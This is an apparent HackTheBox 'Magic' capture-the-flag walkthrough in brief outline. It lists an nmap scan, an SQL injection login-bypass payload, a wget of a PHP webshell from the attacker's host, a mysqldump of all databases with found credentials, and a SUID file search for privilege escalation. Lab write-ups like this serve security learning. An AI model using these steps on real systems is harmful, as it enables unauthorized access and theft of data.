Magic — HackTheBox

Summary

Reconnaissance

nmap -sVC 10.10.10.185

SQL Injection

payload on username field: admin’ or true — — +
Redirection to upload.php after successful login attempt.

Uploading Webshell

Error response after uploading a php reverse shell.
Going to /images/uploads returns Forbidden response so this must be the upload directory.
wget 10.10.14.70/sh3ll.php

Collecting MYSQL Credentials

mysqldump --all-databases --user=theseus --password
user.txt flag

Privilege Escalation

find / -perm -u=s -type f 2>/dev/null
Contents of shell.py
root.txt flag

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store